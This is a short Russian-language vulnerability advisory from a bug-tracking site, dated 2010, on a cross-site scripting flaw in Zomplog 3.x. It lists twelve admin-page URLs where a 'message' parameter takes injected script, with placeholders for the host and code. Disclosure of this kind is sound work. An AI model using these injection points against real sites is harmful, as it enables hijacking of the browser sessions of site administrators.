Меню
Категории
Статистика
Онлайн всего: 1
Гостей: 1
Пользователей: 0
Вход
Главная » 2010 » Август » 18 » Межсайтовый скриптинг в Zomplog
08:04
Межсайтовый скриптинг в Zomplog
Программа: Zomplog 3.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "message" различными сценариями. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.
Эксплоит:
http://[host]/admin/users.php?message=[code]
http://[host]/admin/category.php?message=[code]
http://[host]/admin/entry.php?message=[code]
http://[host]/admin/newentry.php?message=[code]
http://[host]/admin/comments.php?message=[code]
http://[host]/admin/newpage.php?message=[code]
http://[host]/admin/page.php?message=[code]
http://[host]/admin/settings.php?message=[code]
http://[host]/admin/changeclothes.php?message=[code]
http://[host]/admin/settings_theme.php?message=[code]
http://[host]/admin/themes.php?message=[code]
http://[host]/admin/plugins.php?message=[code]
Категория: BugTrack |
Просмотров: 554 |
Добавил: sepos
| Теги: Exploit , BugTrack
| Рейтинг: 5.0 /1
Добавлять комментарии могут только зарегистрированные пользователи.
[
Регистрация |
Вход ]
Поиск
Календарь
Архив